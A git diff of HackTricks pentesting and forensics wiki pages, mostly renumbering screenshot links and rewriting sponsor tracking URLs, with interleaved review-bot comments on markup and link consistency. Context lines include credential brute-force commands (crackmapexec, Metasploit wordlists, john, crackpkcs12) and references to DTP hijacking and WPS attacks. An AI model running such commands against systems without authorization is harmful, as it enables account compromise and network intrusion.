You can use the tool [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser) to get what was written in the communication:
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
index ea588f08e..09770e349 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
@@ -18,9 +18,9 @@ Other ways to support HackTricks:
When you receive a capture whose principal traffic is Wifi using WireShark you can start investigating all the SSIDs of the capture with _Wireless --> WLAN Traffic_:
-![](<../../../.gitbook/assets/image (103).png>)
+![](<../../../.gitbook/assets/image (106).png>)
-![](<../../../.gitbook/assets/image (489).png>)
+![](<../../../.gitbook/assets/image (492).png>)
### Brute Force
@@ -50,7 +50,7 @@ Once you have detected **unknown MAC** addresses communicating inside the networ
Edit --> Preferences --> Protocols --> IEEE 802.11--> Edit
-![](<../../../.gitbook/assets/image (496).png>)
+![](<../../../.gitbook/assets/image (499).png>)
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md
index acc0fef51..67c2ee81d 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
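Review bot: the WhiteIntel heading in this file stays at `###`, while the same sponsor block in hash-length-extension-attack.md and dnscat-exfiltration.md is moved to `####` in this commit. If the demotion is intentional, apply it here too (both occurrences in this file) so the block renders at the same level everywhere.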
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
----
+***
## Improve your Wireshark skills
@@ -45,43 +45,43 @@ The following tutorials are amazing to learn some cool basic tricks:
Clicking on _**Analyze** --> **Expert Information**_ you will have an **overview** of what is happening in the packets **analyzed**:
-![](<../../../.gitbook/assets/image (253).png>)
+![](<../../../.gitbook/assets/image (256).png>)
**Resolved Addresses**
Under _**Statistics --> Resolved Addresses**_ you can find several **information** that was "**resolved**" by wireshark like port/transport to protocol, MAC to the manufacturer, etc. It is interesting to know what is implicated in the communication.
-![](<../../../.gitbook/assets/image (890).png>)
+![](<../../../.gitbook/assets/image (893).png>)
**Protocol Hierarchy**
Under _**Statistics --> Protocol Hierarchy**_ you can find the **protocols** **involved** in the communication and data about them.
-![](<../../../.gitbook/assets/image (583).png>)
+![](<../../../.gitbook/assets/image (586).png>)
**Conversations**
Under _**Statistics --> Conversations**_ you can find a **summary of the conversations** in the communication and data about them.
-![](<../../../.gitbook/assets/image (450).png>)
+![](<../../../.gitbook/assets/image (453).png>)
**Endpoints**
Under _**Statistics --> Endpoints**_ you can find a **summary of the endpoints** in the communication and data about each of them.
-![](<../../../.gitbook/assets/image (893).png>)
+![](<../../../.gitbook/assets/image (896).png>)
**DNS info**
Under _**Statistics --> DNS**_ you can find statistics about the DNS request captured.
-![](<../../../.gitbook/assets/image (1060).png>)
+![](<../../../.gitbook/assets/image (1063).png>)
**I/O Graph**
Under _**Statistics --> I/O Graph**_ you can find a **graph of the communication.**
-![](<../../../.gitbook/assets/image (989).png>)
+![](<../../../.gitbook/assets/image (992).png>)
### Filters
@@ -107,7 +107,7 @@ If you want to **search** for **content** inside the **packets** of the sessions
You can add a column that shows the Host HTTP header:
-![](<../../../.gitbook/assets/image (635).png>)
+![](<../../../.gitbook/assets/image (639).png>)
And a column that add the Server name from an initiating HTTPS connection (**ssl.handshake.type == 1**):
@@ -119,11 +119,11 @@ And a column that add the Server name from an initiating HTTPS connection (**ssl
In current Wireshark instead of `bootp` you need to search for `DHCP`
-![](<../../../.gitbook/assets/image (1010).png>)
+![](<../../../.gitbook/assets/image (1013).png>)
### From NBNS
-![](<../../../.gitbook/assets/image (1000).png>)
+![](<../../../.gitbook/assets/image (1003).png>)
## Decrypting TLS
@@ -131,7 +131,7 @@ In current Wireshark instead of `bootp` you need to search for `DHCP`
_edit>preference>protocol>ssl>_
-![](<../../../.gitbook/assets/image (1100).png>)
+![](<../../../.gitbook/assets/image (1103).png>)
Press _Edit_ and add all the data of the server and the private key (_IP, Port, Protocol, Key file and password_)
@@ -143,11 +143,11 @@ To detect this search inside the environment for to variable `SSLKEYLOGFILE`
A file of shared keys will look like this:
-![](<../../../.gitbook/assets/image (817).png>)
+![](<../../../.gitbook/assets/image (820).png>)
To import this in wireshark go to \_edit > preference > protocol > ssl > and import it in (Pre)-Master-Secret log filename:
-![](<../../../.gitbook/assets/image (986).png>)
+![](<../../../.gitbook/assets/image (989).png>)
## ADB communication
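Review bot: The unchanged instruction line between the two image changes opens with `\_edit` and never closes the emphasis, so the menu path will not render in italics the way `_edit>preference>protocol>ssl>_` does in the previous hunk. Since both screenshots around it are being touched, fix the markup here as well. It is also worth confirming that the `ssl` preference path still matches current Wireshark, given that this page already notes the `bootp` to `DHCP` rename.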
@@ -182,7 +182,7 @@ f.close()
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -192,7 +192,6 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
-
Learn AWS hacking from zero to hero withhtARTE (HackTricks AWS Red Team Expert)!
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
index 2615d6a7e..0752589b6 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=browser-artifacts) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=browser-artifacts" %}
## Browsers Artifacts
@@ -87,7 +87,7 @@ done < $passfile
```
{% endcode %}
-![](<../../../.gitbook/assets/image (689).png>)
+![](<../../../.gitbook/assets/image (692).png>)
## Google Chrome
@@ -183,13 +183,13 @@ These paths and commands are crucial for accessing and understanding the browsin
* [https://books.google.com/books?id=jfMqCgAAQBAJ\&pg=PA128\&lpg=PA128\&dq=%22This+file](https://books.google.com/books?id=jfMqCgAAQBAJ\&pg=PA128\&lpg=PA128\&dq=%22This+file)
* **Book: OS X Incident Response: Scripting and Analysis By Jaron Bradley pag 123**
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=browser-artifacts) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=browser-artifacts" %}
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
index 62cb48dfb..b790746ea 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=local-cloud-storage) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=local-cloud-storage" %}
## OneDrive
@@ -82,7 +82,7 @@ Apart from that information, to decrypt the databases you still need:
Then you can use the tool [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi\_data\_decryptor.html)**:**
-![](<../../../.gitbook/assets/image (440).png>)
+![](<../../../.gitbook/assets/image (443).png>)
If everything goes as expected, the tool will indicate the **primary key** that you need to **use to recover the original one**. To recover the original one, just use this [cyber\_chef receipt](https://gchq.github.io/CyberChef/#recipe=Derive\_PBKDF2\_key\(%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D\)) putting the primary key as the "passphrase" inside the receipt.
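Review bot: The unchanged line below the new image reference links to a CyberChef URL containing `#recipe=` but labels it "cyber\_chef receipt" and then says to put the key "inside the receipt". Both should read "recipe". The line sits directly under the edited screenshot, so it is worth correcting in the same change.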
@@ -115,13 +115,13 @@ Other tables inside this database contain more interesting information:
* **deleted\_fields**: Dropbox deleted files
* **date\_added**
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=local-cloud-storage) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=local-cloud-storage" %}
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
index 7c0953271..a1e2d2614 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=office-file-analysis) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=office-file-analysis" %}
For further information check [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). This is just a sumary:
@@ -37,13 +37,13 @@ sudo pip3 install -U oletools
olevba -c /path/to/document #Extract macros
```
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=office-file-analysis) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=office-file-analysis" %}
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
index ac2268f91..4f7b672d4 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=pdf-file-analysis) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pdf-file-analysis" %}
**For further details check:** [**https://trailofbits.github.io/ctf/forensics/**](https://trailofbits.github.io/ctf/forensics/)
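Review bot: The text link on the `+` line carries `utm_term=trickest`, which the embed URL in the same hunk does not, and which none of the other Trickest text links in this commit (browser-artifacts, local-cloud-storage, office-file-analysis, brute-force) include. Either drop `utm_term=trickest` here or add it to the other links, so the parameter set is the same across pages and only `utm_content` varies.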
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md b/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md
index 70084666b..f77d5f28f 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md
@@ -44,7 +44,7 @@ When a file is deleted in this folder 2 specific files are created:
* `$I{id}`: File information (date of when it was deleted}
* `$R{id}`: Content of the file
-![](<../../../.gitbook/assets/image (1026).png>)
+![](<../../../.gitbook/assets/image (1029).png>)
Having these files you can use the tool [**Rifiuti**](https://github.com/abelcheung/rifiuti2) to get the original address of the deleted files and the date it was deleted (use `rifiuti-vista.exe` for Vista – Win10).
@@ -60,15 +60,15 @@ Shadow Copy is a technology included in Microsoft Windows that can create **back
These backups are usually located in the `\System Volume Information` from the root of the file system and the name is composed of **UIDs** shown in the following image:
-![](<../../../.gitbook/assets/image (91).png>)
+![](<../../../.gitbook/assets/image (94).png>)
Mounting the forensics image with the **ArsenalImageMounter**, the tool [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow\_copy\_view.html) can be used to inspect a shadow copy and even **extract the files** from the shadow copy backups.
-![](<../../../.gitbook/assets/image (573).png>)
+![](<../../../.gitbook/assets/image (576).png>)
The registry entry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` contains the files and keys **to not backup**:
-![](<../../../.gitbook/assets/image (251).png>)
+![](<../../../.gitbook/assets/image (254).png>)
The registry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` also contains configuration information about the `Volume Shadow Copies`.
@@ -128,7 +128,7 @@ The **created time** of any jumplist indicates the **the first time the file was
You can inspect the jumplists using [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md).
-![](<../../../.gitbook/assets/image (165).png>)
+![](<../../../.gitbook/assets/image (168).png>)
(_Note that the timestamps provided by JumplistExplorer are related to the jumplist file itself_)
@@ -146,7 +146,7 @@ It's possible to identify that a USB device was used thanks to the creation of:
Note that some LNK file instead of pointing to the original path, points to the WPDNSE folder:
-![](<../../../.gitbook/assets/image (215).png>)
+![](<../../../.gitbook/assets/image (218).png>)
The files in the folder WPDNSE are a copy of the original ones, then won't survive a restart of the PC and the GUID is taken from a shellbag.
@@ -164,7 +164,7 @@ Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about whe
[**USBDetective**](https://usbdetective.com) can be used to obtain information about the USB devices that have been connected to an image.
-![](<../../../.gitbook/assets/image (449).png>)
+![](<../../../.gitbook/assets/image (452).png>)
### Plug and Play Cleanup
@@ -195,7 +195,7 @@ Emails contain **2 interesting parts: The headers and the content** of the email
Also, inside the `References` and `In-Reply-To` headers you can find the ID of the messages:
-![](<../../../.gitbook/assets/image (590).png>)
+![](<../../../.gitbook/assets/image (593).png>)
### Windows Mail App
@@ -223,7 +223,7 @@ The registry path `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion
You can open the PST file using the tool [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html).
-![](<../../../.gitbook/assets/image (495).png>)
+![](<../../../.gitbook/assets/image (498).png>)
### Microsoft Outlook OST Files
@@ -314,7 +314,7 @@ To inspect these files you can use the tool [**PEcmd.exe**](https://github.com/E
.\PECmd.exe -d C:\Users\student\Desktop\Prefetch --html "C:\Users\student\Desktop\out_folder"
```
-![](<../../../.gitbook/assets/image (312).png>)
+![](<../../../.gitbook/assets/image (315).png>)
### Superprefetch
@@ -364,7 +364,7 @@ Such data is stored within the registry at specific locations based on the versi
To parse the stored information, the [**AppCompatCacheParser** tool](https://github.com/EricZimmerman/AppCompatCacheParser) is recommended for use.
-![](<../../../.gitbook/assets/image (72).png>)
+![](<../../../.gitbook/assets/image (75).png>)
### Amcache
diff --git a/generic-methodologies-and-resources/brute-force.md b/generic-methodologies-and-resources/brute-force.md
index 835bc6564..911750441 100644
--- a/generic-methodologies-and-resources/brute-force.md
+++ b/generic-methodologies-and-resources/brute-force.md
@@ -1,12 +1,12 @@
# Brute Force - CheatSheet
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %}
@@ -108,13 +108,13 @@ Finished in 0.920s.
* [**https://hashkiller.io/listmanager**](https://hashkiller.io/listmanager)
* [**https://github.com/Karanxa/Bug-Bounty-Wordlists**](https://github.com/Karanxa/Bug-Bounty-Wordlists)
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %}
## Services
@@ -544,13 +544,13 @@ set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst
crackmapexec winrm -d -u usernames.txt -p passwords.txt
```
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %}
## Local
@@ -716,7 +716,7 @@ john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
### Cisco
-
+
### DPAPI Master Key
@@ -747,13 +747,13 @@ zip -r file.xls .
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
```
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %}
## Tools
@@ -910,10 +910,10 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %}
diff --git a/generic-methodologies-and-resources/external-recon-methodology/README.md b/generic-methodologies-and-resources/external-recon-methodology/README.md
index 1241665f4..df1d46bc7 100644
--- a/generic-methodologies-and-resources/external-recon-methodology/README.md
+++ b/generic-methodologies-and-resources/external-recon-methodology/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -503,9 +503,9 @@ echo www | subzuf facebook.com
Check this blog post I wrote about how to **automate the subdomain discovery** from a domain using **Trickest workflows** so I don't need to launch manually a bunch of tools in my computer:
-{% embed url="https://trickest.com/blog/full-subdomain-discovery-using-workflow/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/blog/full-subdomain-discovery-using-workflow/" %}
-{% embed url="https://trickest.com/blog/full-subdomain-brute-force-discovery-using-workflow/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/blog/full-subdomain-brute-force-discovery-using-workflow/" %}
### **VHosts / Virtual Hosts**
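Review bot: Both blog embeds on the `+` lines lose their query string entirely, whereas every other Trickest URL in this commit is rewritten to the new `utm_source=hacktricks&utm_medium=...&utm_campaign=ppc&utm_content=...` form. If removing tracking from the blog links is intended, say so in the commit message. Otherwise these two embeds need the same parameter set with `utm_content=external-recon-methodology` or whatever value this page should use.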
@@ -730,7 +730,7 @@ There are several tools out there that will perform part of the proposed actions
* All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/generic-methodologies-and-resources/pentesting-methodology.md b/generic-methodologies-and-resources/pentesting-methodology.md
index 5b75710c6..21863df48 100644
--- a/generic-methodologies-and-resources/pentesting-methodology.md
+++ b/generic-methodologies-and-resources/pentesting-methodology.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -150,7 +150,7 @@ Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be ve
* [**CBC-MAC**](../crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md)
* [**Padding Oracle**](../crypto-and-stego/padding-oracle-priv.md)
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/generic-methodologies-and-resources/pentesting-network/README.md b/generic-methodologies-and-resources/pentesting-network/README.md
index cffa58c2a..71d048be9 100644
--- a/generic-methodologies-and-resources/pentesting-network/README.md
+++ b/generic-methodologies-and-resources/pentesting-network/README.md
@@ -326,7 +326,7 @@ yersinia -I #Interactive mode
yersinia -G #For graphic mode
```
-![](<../../.gitbook/assets/image (266).png>)
+![](<../../.gitbook/assets/image (269).png>)
To enumerate the VLANs it's also possible to generate the DTP Desirable frame with the script [**DTPHijacking.py**](https://github.com/in9uz/VLANPWN/blob/main/DTPHijacking.py)**. D**o not interrupt the script under any circumstances. It injects DTP Desirable every three seconds. **The dynamically created trunk channels on the switch only live for five minutes. After five minutes, the trunk falls off.**
@@ -338,7 +338,7 @@ I would like to point out that **Access/Desirable (0x03)** indicates that the DT
By analyzing the STP frames, **we learn about the existence of VLAN 30 and VLAN 60.**
-
+
#### Attacking specific VLANs
@@ -388,7 +388,7 @@ If an attacker knows the value of the **MAC, IP and VLAN ID of the victim host**
Another option for the attacker is to launch a **TCP port scan spoofing an IP controlled by the attacker and accessible by the victim** (probably through internet). Then, the attacker could sniff in the second host owned by him if it receives some packets from the victim.
-![](<../../.gitbook/assets/image (187).png>)
+![](<../../.gitbook/assets/image (190).png>)
To perform this attack you could use scapy: `pip install scapy`
diff --git a/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md b/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md
index c529886c1..13812d96d 100644
--- a/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md
+++ b/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
{% embed url="https://websec.nl/" %}
@@ -140,7 +140,7 @@ Executing these steps places the attacker in a position to intercept and manipul
## References
- [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
-
+
{% embed url="https://websec.nl/" %}
diff --git a/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md b/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md
index 19b61817e..1239bcb81 100644
--- a/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md
+++ b/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
{% embed url="https://websec.nl/" %}
@@ -271,7 +271,7 @@ Moreover, probes which do not have a specifically defined **`servicewaitms`** us
If you don't want to change the values of **`totalwaitms`** and **`tcpwrappedms`** at all in the `/usr/share/nmap/nmap-service-probes` file, you can edit the [parsing code](https://github.com/nmap/nmap/blob/master/service\_scan.cc#L1358) such that these values in the `nmap-service-probes` file are completely ignored.
-
+
{% embed url="https://websec.nl/" %}
diff --git a/generic-methodologies-and-resources/pentesting-wifi/README.md b/generic-methodologies-and-resources/pentesting-wifi/README.md
index bffca30d6..87f641f6d 100644
--- a/generic-methodologies-and-resources/pentesting-wifi/README.md
+++ b/generic-methodologies-and-resources/pentesting-wifi/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@@ -235,7 +235,7 @@ A packet fuzzer featuring diverse packet sources and a comprehensive set of modi
_**Airgeddon**_ offers most of the attacks proposed in the previous comments:
-![](<../../.gitbook/assets/image (92).png>)
+![](<../../.gitbook/assets/image (95).png>)
## WPS
@@ -293,7 +293,7 @@ Some poorly designed systems even let a **Null PIN** (an empty or nonexistent PI
All the proposed WPS attacks can be easily performed using _**airgeddon.**_
-![](<../../.gitbook/assets/image (216).png>)
+![](<../../.gitbook/assets/image (219).png>)
* 5 and 6 lets you try **your custom PIN** (if you have any)
* 7 and 8 perform the **Pixie Dust attack**
@@ -305,11 +305,11 @@ All the proposed WPS attacks can be easily performed using _**airgeddon.**_
So broken and unused nowdays. Just know that _**airgeddon**_ have a WEP option called "All-in-One" to attack this kind of protection. More tools offer similar options.
-![](<../../.gitbook/assets/image (429).png>)
+![](<../../.gitbook/assets/image (432).png>)
***
-
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@@ -467,7 +467,7 @@ Reading [https://tools.ietf.org/html/rfc3748#page-27](https://tools.ietf.org/htm
Even using one of the most secure of authentication methods: **PEAP-EAP-TLS**, it is possible to **capture the username sent in the EAP protocol**. To do so, **capture a authentication communication** (start `airodump-ng` inside a channel and `wireshark` in the same interface) and filter the packets by`eapol`.\
Inside the "**Response, Identity**" packet, the **username** of the client will appear.
-![](<../../.gitbook/assets/image (847).png>)
+![](<../../.gitbook/assets/image (850).png>)
### Anonymous Identities
